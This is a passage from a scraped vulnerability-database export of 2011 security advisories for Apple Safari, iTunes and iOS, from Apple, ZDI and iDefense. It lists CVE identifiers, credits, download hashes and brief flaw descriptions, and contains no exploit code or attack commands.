Ltd.\r\n\r\n\r\nNote: Safari 5.1 is included with OS X Lion.\r\n\r\n\r\nSafari 5.1 and Safari 5.0.6 address the same set of security\r\nissues. Safari 5.1 is provided for Mac OS X v10.6,\r\nand Windows systems. Safari 5.0.6 is provided for\r\nMac OS X v10.5 systems.\r\n\r\nSafari 5.1 is available via the Apple Software Update\r\napplication, or Apple's Safari download site at:\r\nhttp://www.apple.com/safari/download/\r\n\r\nSafari 5.0.6 is available via the Apple Software Update\r\napplication, or Apple's Software Downloads web site:\r\nhttp://www.apple.com/support/downloads/\r\n\r\nSafari for Mac OS X v10.6.8 and later\r\nThe download file is named: Safari5.1SnowLeopard.dmg\r\nIts SHA-1 digest is: 2c3cef8e06c5aa586379b1a5fd5cf7b54e8acc24\r\n\r\nSafari for Mac OS X v10.5.8\r\nThe download file is named: Safari5.0.6Leopard.dmg\r\nIts SHA-1 digest is: ea970375d2116a7b74094a2a7669bebc306b6e6f\r\n\r\nSafari for Windows 7, Vista or XP\r\nThe download file is named: SafariSetup.exe\r\nIts SHA-1 digest is: d00b791c694b1ecfc22d6a1ec9aa21cc14fd8e36\r\n\r\nSafari for Windows 7, Vista or XP from the Microsoft Choice Screen\r\nThe download file is named: Safari_Setup.exe\r\nIts SHA-1 digest is: ccb3bb6b06468a430171d9f62708a1a6d917f45b\r\n\r\nSafari+QuickTime for Windows 7, Vista or XP\r\nThe file is named: SafariQuickTimeSetup.exe\r\nIts SHA-1 digest is: 1273e0ee742a294d65e4f25a9b3e36f79fb517c9\r\n\r\nInformation will also be posted to the Apple Security Updates\r\nweb site: http://support.apple.com/kb/HT1222\r\n\r\nThis message is signed with Apple's Product Security PGP key,\r\nand details are available at:\r\nhttps://www.apple.com/support/security/pgp/\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v2.0.9 (Darwin)\r\n\r\niQEcBAEBAgAGBQJOJI45AAoJEGnF2JsdZQeezHQIALKZms5tzYgYxUSdxmo+DmYw\r\nup9gAmEVcltZvCeVS1lUxfjqnRiGRSWyuou8Ynt9PfGQCz9GfLvzlrCHc5rsnKaD\r\nMeYY1IH7lQc6aqmV0hwb4nUL5qJntP6G5Ai0E/0UiRQNC/ummS+qnmdsiFo78ODY\r\nnKaB5cAWhqGHgOAPnUG0JwmxpYgR2HEtGYJSqlYykMwt1vnlAr5hHVNaUJcJ3Hlb\r\nvesN6fB7zQMiJVo8+iJBixCvIYlbII5HnVAmD1ToyKgENg4Iguo46YBMVr8DPgF/\r\nKD2s0+VF/O4utYVX0GiRGReVyq1PMvz/HI23ym8U3LjbezXD/AALQET0Q2hUEYQ=\r\n=fOfF\r\n-----END PGP SIGNATURE-----\r\n\r\n\r\n", "modified": "2011-07-22T00:00:00", "published": "2011-07-22T00:00:00", "id": "SECURITYVULNS:DOC:26666", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:26666", "title": "APPLE-SA-2011-07-20-1 Safari 5.1 and Safari 5.0.6", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:09:44", "bulletinFamily": "software", "description": "Multiple security vulnerabilities on different media formats parsing.", "modified": "2011-10-16T00:00:00", "published": "2011-10-16T00:00:00", "id": "SECURITYVULNS:VULN:11974", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:11974", "title": "Apple iTunes multiple security vulnerabilities", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:42", "bulletinFamily": "software", "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nAPPLE-SA-2011-10-11-1 iTunes 10.5\r\n\r\niTunes 10.5 is now available and addresses the following:\r\n\r\nCoreFoundation\r\nAvailable for: Windows 7, Vista, XP SP2 or later\r\nImpact: A man-in-the-middle attack may lead to an unexpected\r\napplication termination or arbitrary code execution\r\nDescription: A memory corruption issue existed in the handling of\r\nstring tokenization. This issue does not affect OS X Lion systems.\r\nFor Mac OS X v10.6 systems, this issue is addressed in Security\r\nUpdate 2011-006.\r\nCVE-ID\r\nCVE-2011-0259 : Apple\r\n\r\nColorSync\r\nAvailable for: Windows 7, Vista, XP SP2 or later\r\nImpact: Viewing a maliciously crafted image with an embedded\r\nColorSync profile may lead to an unexpected application termination\r\nor arbitrary code execution\r\nDescription: An integer overflow existed in the handling of images\r\nwith an embedded ColorSync profile, which may lead to a heap buffer\r\noverflow. Opening a maliciously crafted image with an embedded\r\nColorSync profile may lead to an unexpected application termination\r\nor arbitrary code execution. This issue does not affect OS X Lion\r\nsystems.\r\nCVE-ID\r\nCVE-2011-0200 : binaryproof working with TippingPoint's Zero Day\r\nInitiative\r\n\r\nCoreAudio\r\nAvailable for: Windows 7, Vista, XP SP2 or later\r\nImpact: Playing maliciously crafted audio content may lead to an\r\nunexpected application termination or arbitrary code execution\r\nDescription: A buffer overflow existed in the handling of audio\r\nstream encoded with the advanced audio code. This issue does not\r\naffect OS X Lion systems.\r\nCVE-ID\r\nCVE-2011-3252 : Luigi Auriemma working with TippingPoint's Zero Day\r\nInitiative\r\n\r\nCoreMedia\r\nAvailable for: Windows 7, Vista, XP SP2 or later\r\nImpact: Viewing a maliciously crafted movie file may lead to an\r\nunexpected application termination or arbitrary code execution\r\nDescription: A buffer overflow existed in the handling of H.264\r\nencoded movie files. For OS X Lion systems, this issue is addressed\r\nin OS X Lion v10.7.2. For Mac OS X v10.6 systems, this issue is\r\naddressed in Security Update 2011-006.\r\nCVE-ID\r\nCVE-2011-3219 : Damian Put working with TippingPoint's Zero Day\r\nInitiative\r\n\r\nImageIO\r\nAvailable for: Windows 7, Vista, XP SP2 or later\r\nImpact: Viewing a maliciously crafted TIFF image may lead to an\r\nunexpected application termination or arbitrary code execution\r\nDescription: A heap buffer overflow existed in ImageIO's handling of\r\nTIFF images. This issue does not affect OS X Lion systems. For Mac OS\r\nX v10.6 systems, this issue is addressed in Mac OS X v10.6.8.\r\nCVE-ID\r\nCVE-2011-0204 : Dominic Chell of NGS Secure\r\n\r\nImageIO\r\nAvailable for: Windows 7, Vista, XP SP2 or later\r\nImpact: Viewing a maliciously crafted TIFF image may lead to an\r\nunexpected application termination or arbitrary code execution\r\nDescription: A reentrancy issue existed in ImageIO's handling of\r\nTIFF images. This issue does not affect Mac OS X systems.\r\nCVE-ID\r\nCVE-2011-0215 : Juan Pablo Lopez Yacubian working with iDefense VCP\r\n\r\nWebKit\r\nAvailable for: Windows 7, Vista, XP SP2 or later\r\nImpact: A man-in-the-middle attack while browsing the iTunes Store\r\nvia iTunes may lead to an unexpected application termination or\r\narbitrary code execution.\r\nDescription: Multiple memory corruption issues existed in WebKit.\r\nCVE-ID\r\nCVE-2010-1823 : David Weston of Microsoft and Microsoft Vulnerability\r\nResearch (MSVR), wushi of team509, and Yong Li of Research In Motion\r\nLtd\r\nCVE-2011-0164 : Apple\r\nCVE-2011-0218 : SkyLined of Google Chrome Security Team\r\nCVE-2011-0221 : Abhishek Arya (Inferno) of Google Chrome Security\r\nTeam\r\nCVE-2011-0222 : Nikita Tarakanov and Alex Bazhanyuk of the CISS\r\nResearch Team, and Abhishek Arya (Inferno) of Google Chrome Security\r\nTeam\r\nCVE-2011-0223 : Jose A. Vazquez of spa-s3c.blogspot.com working with\r\niDefense VCP\r\nCVE-2011-0225 : Abhishek Arya (Inferno) of Google Chrome Security\r\nTeam\r\nCVE-2011-0232 : J23 working with TippingPoint's Zero Day Initiative\r\nCVE-2011-0233 : wushi of team509 working with TippingPoint's Zero Day\r\nInitiative\r\nCVE-2011-0234 : Rob King working with TippingPoint's Zero Day\r\nInitiative, wushi of team509 working with TippingPoint's Zero Day\r\nInitiative, wushi of team509 working with iDefense VCP\r\nCVE-2011-0235 : Abhishek Arya (Inferno) of Google Chrome Security\r\nTeam\r\nCVE-2011-0237 : wushi of team509 working with iDefense VCP\r\nCVE-2011-0238 : Adam Barth of Google Chrome Security Team\r\nCVE-2011-0240 : wushi of team509 working with iDefense VCP\r\nCVE-2011-0253 : Richard Keen\r\nCVE-2011-0254 : An anonymous researcher working with TippingPoint's\r\nZero Day Initiative\r\nCVE-2011-0255 : An anonymous researcher working with TippingPoint's\r\nZero Day Initiative\r\nCVE-2011-0981 : Rik Cabanier of Adobe Systems, Inc\r\nCVE-2011-0983 : Martin Barbella\r\nCVE-2011-1109 : Sergey Glazunov\r\nCVE-2011-1114 : Martin Barbella\r\nCVE-2011-1115 : Martin Barbella\r\nCVE-2011-1117 : wushi of team509\r\nCVE-2011-1121 : miaubiz\r\nCVE-2011-1188 : Martin Barbella\r\nCVE-2011-1203 : Sergey Glazunov\r\nCVE-2011-1204 : Sergey Glazunov\r\nCVE-2011-1288 : Andreas Kling of Nokia\r\nCVE-2011-1293 : Sergey Glazunov\r\nCVE-2011-1296 : Sergey Glazunov\r\nCVE-2011-1440 : Jose A. Vazquez of spa-s3c.blogspot.com\r\nCVE-2011-1449 : Marek Majkowski\r\nCVE-2011-1451 : Sergey Glazunov\r\nCVE-2011-1453 : wushi of team509 working with TippingPoint's Zero Day\r\nInitiative\r\nCVE-2011-1457 : John Knottenbelt of Google\r\nCVE-2011-1462 : wushi of team509\r\nCVE-2011-1797 : wushi of team509\r\nCVE-2011-2338 : Abhishek Arya (Inferno) of Google Chrome Security\r\nTeam using AddressSanitizer\r\nCVE-2011-2339 : Cris Neckar of the Google Chrome Security Team\r\nCVE-2011-2341 : Apple\r\nCVE-2011-2351 : miaubiz\r\nCVE-2011-2352 : Apple\r\nCVE-2011-2354 : Apple\r\nCVE-2011-2356 : Adam Barth and Abhishek Arya of Google Chrome\r\nSecurity Team using AddressSanitizer\r\nCVE-2011-2359 : miaubiz\r\nCVE-2011-2788 : Mikolaj Malecki of Samsung\r\nCVE-2011-2790 : miaubiz\r\nCVE-2011-2792 : miaubiz\r\nCVE-2011-2797 : miaubiz\r\nCVE-2011-2799 : miaubiz\r\nCVE-2011-2809 : Abhishek Arya (Inferno) of Google Chrome Security\r\nTeam\r\nCVE-2011-2811 : Apple\r\nCVE-2011-2813 : Cris Neckar of Google Chrome Security Team using\r\nAddressSanitizer\r\nCVE-2011-2814 : Abhishek Arya (Inferno) of Google Chrome Security\r\nTeam using AddressSanitizer\r\nCVE-2011-2815 : SkyLined of Google Chrome Security Team\r\nCVE-2011-2816 : Apple\r\nCVE-2011-2817 : Abhishek Arya (Inferno) of Google Chrome Security\r\nTeam using AddressSanitizer\r\nCVE-2011-2818 : Martin Barbella\r\nCVE-2011-2820 : Raman Tenneti and Philip Rogers of Google\r\nCVE-2011-2823 : SkyLined of Google Chrome Security Team\r\nCVE-2011-2827 : miaubiz\r\nCVE-2011-2831 : Abhishek Arya (Inferno) of Google Chrome Security\r\nTeam using AddressSanitizer\r\nCVE-2011-3232 : Aki Helin of OUSPG\r\nCVE-2011-3233 : Sadrul Habib Chowdhury of the Chromium development\r\ncommunity, Cris Neckar and Abhishek Arya (Inferno) of Google Chrome\r\nSecurity Team\r\nCVE-2011-3234 : miaubiz\r\nCVE-2011-3235 : Dimitri Glazkov, Kent Tamura, Dominic Cooney of the\r\nChromium development community, and Abhishek Arya (Inferno) of Google\r\nChrome Security Team\r\nCVE-2011-3236 : Abhishek Arya (Inferno) of Google Chrome Security\r\nTeam using AddressSanitizer\r\nCVE-2011-3237 : Dimitri Glazkov, Kent Tamura, Dominic Cooney of the\r\nChromium development community, and Abhishek Arya (Inferno) of Google\r\nChrome Security Team\r\nCVE-2011-3238 : Martin Barbella\r\nCVE-2011-3239 : Slawomir Blazek\r\nCVE-2011-3241 : Apple\r\nCVE-2011-3244 : vkouchna\r\n\r\nWebKit\r\nAvailable for: Windows 7, Vista, XP SP2 or later\r\nImpact: A man-in-the-middle attack may lead to arbitrary code\r\nexecution\r\nDescription: A configuration issue existed in WebKit's use of\r\nlibxslt. A man-in-the-middle attack while browsing the iTunes Store\r\nvia iTunes may lead to arbitrary files being created with the\r\nprivileges of the user, which may lead to arbitrary code execution.\r\nThis issue is addressed through improved libxslt security settings.\r\nCVE-ID\r\nCVE-2011-1774 : Nicolas Gregoire of Agarri\r\n\r\n\r\niTunes 10.5 may be obtained from:\r\nhttp://www.apple.com/itunes/download/\r\n\r\nFor Windows XP / Vista / Windows 7:\r\nThe download file is named: "iTunesSetup.exe"\r\nIts SHA-1 digest is: 1205cda4ce9a32db2fe02cf9f2cf2c0bf7d47bdb\r\n\r\nFor 64-bit Windows XP / Vista / Windows 7:\r\nThe download file is named: "iTunes64Setup.exe"\r\nIts SHA-1 digest is: ab400ad27a537613b3b5306ea026763a93d57fdf\r\n\r\nInformation will also be posted to the Apple Security Updates\r\nweb site: http://support.apple.com/kb/HT1222\r\n\r\nThis message is signed with Apple's Product Security PGP key,\r\nand details are available at:\r\nhttps://www.apple.com/support/security/pgp/\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG/MacGPG2 v2.0.16 (Darwin)\r\n\r\niQEcBAEBAgAGBQJOlHiHAAoJEGnF2JsdZQee3qwH/0lwVfV3mYVgDxPYfnJlPVF/\r\n2LNjJjmafyNdzSoOOyL9bn5QZqdDlvHCkjgpsq+yX7//8bF/kN7qj3jNBh2qMFCa\r\ncTqIpRnJP5G1GwCdWCep6ZS9NNcv7pADcuoLrHJAHyFE+BlTSNJPkiD3noJiBBuQ\r\nj6CZl5If05rDY7fhspQ6zTlJ7NzzyTIrGM1aJXur2wawVhEALO56gb7+GzGeORax\r\nzU0Jafu9OL8naPfXOFRCvqGXyGBEW0VeWzGqaudDvui1LA5djp6B5AknuE4Xlotq\r\nfXPtwmylQ3B4OaBkoavqPI/UwKkQe0Bn/EsTHf4Pxeo+11CLwRg+JgLCanXRpqw=\r\n=12aV\r\n-----END PGP SIGNATURE-----\r\n", "modified": "2011-10-16T00:00:00", "published": "2011-10-16T00:00:00", "id": "SECURITYVULNS:DOC:27156", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:27156", "title": "APPLE-SA-2011-10-11-1 iTunes 10.5", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:41", "bulletinFamily": "software", "description": "ZDI-11-239: Apple Safari Webkit FrameOwner Element Remote Code Execution Vulnerability\r\n\r\nhttp://www.zerodayinitiative.com/advisories/ZDI-11-239\r\n\r\nJuly 27, 2011\r\n\r\n-- CVE ID:\r\nCVE-2011-0233\r\n\r\n-- CVSS:\r\n7.5, (AV:N/AC:L/Au:N/C:P/I:P/A:P)\r\n\r\n-- Affected Vendors:\r\nApple\r\n\r\n-- Affected Products:\r\nApple WebKit\r\n\r\n-- Vulnerability Details:\r\nThis vulnerability allows remote attackers to execute arbitrary code on\r\nvulnerable installations of Apple Safari Webkit. User interaction is\r\nrequired to exploit this vulnerability in that the target must visit a\r\nmalicious page or open a malicious file.\r\n\r\nThe specific flaw exists within the library's implementation of a\r\nFrameOwner element. When building this tree, the application will create\r\na duplicate reference of an element. By freeing the referenced element,\r\na use-after-free condition can be made to occur which can lead to code\r\nexecution under the context of the application.\r\n\r\n-- Vendor Response:\r\nApple has issued an update to correct this vulnerability. More\r\ndetails can be found at:\r\n\r\nhttp://support.apple.com/kb/HT4808\r\n\r\n-- Disclosure Timeline:\r\n2011-01-21 - Vulnerability reported to vendor\r\n2011-07-27 - Coordinated public release of advisory\r\n\r\n-- Credit:\r\nThis vulnerability was discovered by:\r\n * wushi of team509\r\n\r\n-- About the Zero Day Initiative (ZDI):\r\nEstablished by TippingPoint, The Zero Day Initiative (ZDI) represents \r\na best-of-breed model for rewarding security researchers for responsibly\r\ndisclosing discovered vulnerabilities.\r\n\r\nResearchers interested in getting paid for their security research\r\nthrough the ZDI can find more information and sign-up at:\r\n\r\n http://www.zerodayinitiative.com\r\n\r\nThe ZDI is unique in how the acquired vulnerability information is\r\nused. TippingPoint does not re-sell the vulnerability details or any\r\nexploit code. Instead, upon notifying the affected product vendor,\r\nTippingPoint provides its customers with zero day protection through\r\nits intrusion prevention technology. Explicit details regarding the\r\nspecifics of the vulnerability are not exposed to any parties until\r\nan official vendor patch is publicly available. Furthermore, with the\r\naltruistic aim of helping to secure a broader user base, TippingPoint\r\nprovides this vulnerability information confidentially to security\r\nvendors (including competitors) who have a vulnerability protection or\r\nmitigation product.\r\n\r\nOur vulnerability disclosure policy is available online at:\r\n\r\n http://www.zerodayinitiative.com/advisories/disclosure_policy/\r\n\r\nFollow the ZDI on Twitter:\r\n\r\n http://twitter.com/thezdi", "modified": "2011-08-01T00:00:00", "published": "2011-08-01T00:00:00", "id": "SECURITYVULNS:DOC:26755", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:26755", "title": "ZDI-11-239: Apple Safari Webkit FrameOwner Element Remote Code Execution Vulnerability", "type": "securityvulns", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:41", "bulletinFamily": "software", "description": "iDefense Security Advisory 07.20.11\r\nhttp://labs.idefense.com/intelligence/vulnerabilities/\r\nJul 20, 2011\r\n\r\nI. BACKGROUND\r\n\r\nSafari is Apple's web browser, and is based on the open source WebKit\r\nbrowser engine. MobileSafari is Safari for Apple's mobile devices\r\nincluding the iPad and iPhone. For more information, see the vendor's\r\nsite found at the following link.\r\n\r\nhttp://www.apple.com/safari/\r\n\r\nII. DESCRIPTION\r\n\r\nRemote exploitation of a memory corruption vulnerability in Apple Inc.'s\r\nSafari browser could allow an attacker to execute arbitrary code with\r\nthe privileges of the current user.\r\n\r\nSafari is Apple's Web browser and is based on the open source WebKit\r\nbrowser engine.\r\n\r\nThis vulnerability occurs when Safari incorrectly handles an error state\r\nwhen encountering a broken XHTML tag. Specifically, the tag enclosing\r\nthe tag being processed is freed and is then referenced after it has\r\nalready been freed. This can lead to the execution of arbitrary code.\r\n\r\nIII. ANALYSIS\r\n\r\nExploitation of this vulnerability results in the execution of arbitrary\r\ncode with the privileges of the user viewing the Web page. To exploit\r\nthis vulnerability, a targeted user must load a malicious Web page\r\ncreated by an attacker. An attacker typically accomplishes this via\r\nsocial engineering or injecting content into compromised, trusted sites.\r\nAfter the user visits the malicious Web page, no further user\r\ninteraction is needed.\r\n\r\nIV. DETECTION\r\n\r\nSafari versions prior to 5.1 and 5.0.6 are vulnerable.\r\n\r\nV. WORKAROUND\r\n\r\nDisabling JavaScript is an effective workaround for this vulnerability.\r\n\r\nVI. VENDOR RESPONSE\r\n\r\nApple Inc. has released patches which addresses this issue. For more\r\ninformation, consult their advisory at the following URL:\r\n\r\nhttp://support.apple.com/kb/HT4808\r\n\r\nVII. CVE INFORMATION\r\n\r\nThe Common Vulnerabilities and Exposures (CVE) project has assigned the\r\nname CVE-2011-0234 to this issue. This is a candidate for inclusion in\r\nthe CVE list (http://cve.mitre.org/), which standardizes names for\r\nsecurity problems.\r\n\r\nVIII. DISCLOSURE TIMELINE\r\n\r\n06/01/2011 Initial Vendor Notification\r\n06/01/2011 Initial Vendor Reply\r\n07/20/2011 Coordinated Public Disclosure\r\n\r\nIX. CREDIT\r\n\r\nThis vulnerability was reported to iDefense by wushi of team509.\r\n\r\nGet paid for vulnerability research\r\nhttp://labs.idefense.com/methodology/vulnerability/vcp.php\r\n\r\nFree tools, research and upcoming events\r\nhttp://labs.idefense.com/\r\n\r\nX. LEGAL NOTICES\r\n\r\nCopyright A\u00a9 2011 Verisign\r\n\r\nPermission is granted for the redistribution of this alert\r\nelectronically. It may not be edited in any way without the express\r\nwritten consent of iDefense. If you wish to reprint the whole or any\r\npart of this alert in any other medium other than electronically, please\r\ne-mail customerservice@idefense.com for permission.\r\n\r\nDisclaimer: The information in the advisory is believed to be accurate\r\nat the time of publishing based on currently available information. Use\r\nof the information constitutes acceptance for use in an AS IS condition.\r\n There are no warranties with regard to this information. Neither the\r\nauthor nor the publisher accepts any liability for any direct, indirect,\r\nor consequential loss or damage arising from use of, or reliance on,\r\nthis information.\r\n\r\n\r\n", "modified": "2011-07-22T00:00:00", "published": "2011-07-22T00:00:00", "id": "SECURITYVULNS:DOC:26668", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:26668", "title": "iDefense Security Advisory 07.20.11: Apple Safari innerText Use-After-Free Vulnerability", "type": "securityvulns", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:41", "bulletinFamily": "software", "description": "ZDI-11-240: Apple Safari Webkit SVG Marker Remote Code Execution Vulnerability\r\n\r\nhttp://www.zerodayinitiative.com/advisories/ZDI-11-240\r\n\r\nJuly 27, 2011\r\n\r\n-- CVE ID:\r\nCVE-2011-1453\r\n\r\n-- CVSS:\r\n7.5, (AV:N/AC:L/Au:N/C:P/I:P/A:P)\r\n\r\n-- Affected Vendors:\r\nApple\r\n\r\n-- Affected Products:\r\nApple WebKit\r\n\r\n-- TippingPoint(TM) IPS Customer Protection:\r\nTippingPoint IPS customers have been protected against this\r\nvulnerability by Digital Vaccine protection filter ID 11273. \r\nFor further product information on the TippingPoint IPS, visit:\r\n\r\n http://www.tippingpoint.com\r\n\r\n-- Vulnerability Details:\r\nThis vulnerability allows remote attackers to execute arbitrary code on\r\nvulnerable installations of Apple Safari's Webkit. User interaction is\r\nrequired to exploit this vulnerability in that the target must visit a\r\nmalicious page or open a malicious file.\r\n\r\nThe specific flaw exists within the library's support of SVG markers.\r\nWhen updating a marker, the application will duplicate the reference of\r\nan object without updating its reference count. When freeing this\r\nobject, a use-after-free vulnerability can be made to occur. This can be\r\nleveraged by a remote attacker to execute code under the context of the\r\nuser running the application.\r\n\r\n-- Vendor Response:\r\nApple has issued an update to correct this vulnerability. More\r\ndetails can be found at:\r\nhttp://support.apple.com/kb/HT4808\r\n\r\n-- Disclosure Timeline:\r\n2011-01-21 - Vulnerability reported to vendor\r\n2011-07-27 - Coordinated public release of advisory\r\n\r\n-- Credit:\r\nThis vulnerability was discovered by:\r\n * wushi of team509\r\n\r\n-- About the Zero Day Initiative (ZDI):\r\nEstablished by TippingPoint, The Zero Day Initiative (ZDI) represents \r\na best-of-breed model for rewarding security researchers for responsibly\r\ndisclosing discovered vulnerabilities.\r\n\r\nResearchers interested in getting paid for their security research\r\nthrough the ZDI can find more information and sign-up at:\r\n\r\n http://www.zerodayinitiative.com\r\n\r\nThe ZDI is unique in how the acquired vulnerability information is\r\nused. TippingPoint does not re-sell the vulnerability details or any\r\nexploit code. Instead, upon notifying the affected product vendor,\r\nTippingPoint provides its customers with zero day protection through\r\nits intrusion prevention technology. Explicit details regarding the\r\nspecifics of the vulnerability are not exposed to any parties until\r\nan official vendor patch is publicly available. Furthermore, with the\r\naltruistic aim of helping to secure a broader user base, TippingPoint\r\nprovides this vulnerability information confidentially to security\r\nvendors (including competitors) who have a vulnerability protection or\r\nmitigation product.\r\n\r\nOur vulnerability disclosure policy is available online at:\r\n\r\n http://www.zerodayinitiative.com/advisories/disclosure_policy/\r\n\r\nFollow the ZDI on Twitter:\r\n\r\n http://twitter.com/thezdi", "modified": "2011-08-01T00:00:00", "published": "2011-08-01T00:00:00", "id": "SECURITYVULNS:DOC:26756", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:26756", "title": "ZDI-11-240: Apple Safari Webkit SVG Marker Remote Code Execution Vulnerability", "type": "securityvulns", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:09:44", "bulletinFamily": "software", "description": "Multiple vulnerabilities in different system components and applications.", "modified": "2011-10-16T00:00:00", "published": "2011-10-16T00:00:00", "id": "SECURITYVULNS:VULN:11971", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:11971", "title": "Apple iPhone multiple security vulnerabilities", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:42", "bulletinFamily": "software", "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nAPPLE-SA-2011-10-12-1 iOS 5 Software Update\r\n\r\niOS 5 Software Update is now available and addresses the following:\r\n\r\nCalDAV\r\nAvailable for: iOS 3.0 through 4.3.5 for iPhone 3GS and iPhone 4,\r\niOS 3.1 through 4.3.5 for iPod touch (3rd generation) and later,\r\niOS 3.2 through 4.3.5 for iPad\r\nImpact: An attacker with a privileged network position may intercept\r\nuser credentials or other sensitive information from a CalDAV\r\ncalendar server\r\nDescription: CalDAV did not check that the SSL certificate presented\r\nby the server was trusted.\r\nCVE-ID\r\nCVE-2011-3253 : Leszek Tasiemski of nSense\r\n\r\nCalendar\r\nAvailable for: iOS 4.2.0 through 4.3.5 for iPhone 3GS and iPhone 4,\r\niOS 4.2.0 through 4.3.5 for iPod touch (3rd generation) and later,\r\niOS 4.2.0 through 4.3.5 for iPad\r\nImpact: Viewing a maliciously crafted calendar invitation may inject\r\nscript in the local domain\r\nDescription: A script injection issue existed in Calendar's handling\r\nof invitation notes. This issue is addressed through improved\r\nescaping of special characters in invitation notes. This issues does\r\nnot affect devices prior to iOS 4.2.0.\r\nCVE-ID\r\nCVE-2011-3254 : Rick Deacon\r\n\r\nCFNetwork\r\nAvailable for: iOS 3.0 through 4.3.5 for iPhone 3GS and iPhone 4,\r\niOS 3.1 through 4.3.5 for iPod touch (3rd generation) and later,\r\niOS 3.2 through 4.3.5 for iPad\r\nImpact: User's AppleID password may be logged to a local file\r\nDescription: A user's AppleID password and username were logged to a\r\nfile that was readable by applications on the system. This is\r\nresolved by no longer logging these credentials.\r\nCVE-ID\r\nCVE-2011-3255 : Peter Quade of qdevelop\r\n\r\nCFNetwork\r\nAvailable for: iOS 3.0 through 4.3.5 for iPhone 3GS and iPhone 4,\r\niOS 3.1 through 4.3.5 for iPod touch (3rd generation) and later,\r\niOS 3.2 through 4.3.5 for iPad\r\nImpact: Visiting a maliciously crafted website may lead to the\r\ndisclosure of sensitive information\r\nDescription: An issue existed in CFNetwork's handling of HTTP\r\ncookies. When accessing a maliciously crafted HTTP or HTTPS URL,\r\nCFNetwork could incorrectly send the cookies for a domain to a server\r\noutside that domain.\r\nCVE-ID\r\nCVE-2011-3246 : Erling Ellingsen of Facebook\r\n\r\nCoreFoundation\r\nAvailable for: iOS 3.0 through 4.3.5 for iPhone 3GS and iPhone 4,\r\niOS 3.1 through 4.3.5 for iPod touch (3rd generation) and later,\r\niOS 3.2 through 4.3.5 for iPad\r\nImpact: Viewing a maliciously crafted website or e-mail message may\r\nlead to an unexpected application termination or arbitrary code\r\nexecution\r\nDescription: A memory corruption issue existed in CoreFoundation's\r\nhandling of string tokenization.\r\nCVE-ID\r\nCVE-2011-0259 : Apple\r\n\r\nCoreGraphics\r\nAvailable for: iOS 3.0 through 4.3.5 for iPhone 3GS and iPhone 4,\r\niOS 3.1 through 4.3.5 for iPod touch (3rd generation) and later,\r\niOS 3.2 through 4.3.5 for iPad\r\nImpact: Viewing a document containing a maliciously crafted font may\r\nlead to arbitrary code execution\r\nDescription: Multiple memory corruption existed in freetype, the\r\nmost serious of which may lead to arbitrary code execution when\r\nprocessing a maliciously crafted font.\r\nCVE-ID\r\nCVE-2011-3256 : Apple\r\n\r\nCoreMedia\r\nAvailable for: iOS 3.0 through 4.3.5 for iPhone 3GS and iPhone 4,\r\niOS 3.1 through 4.3.5 for iPod touch (3rd generation) and later,\r\niOS 3.2 through 4.3.5 for iPad\r\nImpact: Visiting a maliciously crafted website may lead to the\r\ndisclosure of video data from another site\r\nDescription: A cross-origin issue existed in CoreMedia's handling of\r\ncross-site redirects. This issue is addressed through improved origin\r\ntracking.\r\nCVE-ID\r\nCVE-2011-0187 : Nirankush Panchbhai and Microsoft Vulnerability\r\nResearch (MSVR)\r\n\r\nData Access\r\nAvailable for: iOS 3.0 through 4.3.5 for iPhone 3GS and iPhone 4,\r\niOS 3.1 through 4.3.5 for iPod touch (3rd generation) and later,\r\niOS 3.2 through 4.3.5 for iPad\r\nImpact: An exchange mail cookie management issue could incorrectly\r\ncause data synchronization across different accounts\r\nDescription: When multiple mail exchange accounts are configured\r\nwhich connect to the same server, a session could potentially receive\r\na valid cookie corresponding to a different account. This issue is\r\naddressed by ensuring that cookies are separated across different\r\naccounts.\r\nCVE-ID\r\nCVE-2011-3257 : Bob Sielken of IBM\r\n\r\nData Security\r\nAvailable for: iOS 3.0 through 4.3.5 for iPhone 3GS and iPhone 4,\r\niOS 3.1 through 4.3.5 for iPod touch (3rd generation) and later,\r\niOS 3.2 through 4.3.5 for iPad\r\nImpact: An attacker with a privileged network position may intercept\r\nuser credentials or other sensitive information\r\nDescription: Fraudulent certificates were issued by multiple\r\ncertificate authorities operated by DigiNotar. This issue is\r\naddressed by removing DigiNotar from the list of trusted root\r\ncertificates, from the list of Extended Validation (EV) certificate\r\nauthorities, and by configuring default system trust settings so that\r\nDigiNotar's certificates, including those issued by other\r\nauthorities, are not trusted.\r\n\r\nData Security\r\nAvailable for: iOS 3.0 through 4.3.5 for iPhone 3GS and iPhone 4,\r\niOS 3.1 through 4.3.5 for iPod touch (3rd generation) and later,\r\niOS 3.2 through 4.3.5 for iPad\r\nImpact: Support for X.509 certificates with MD5 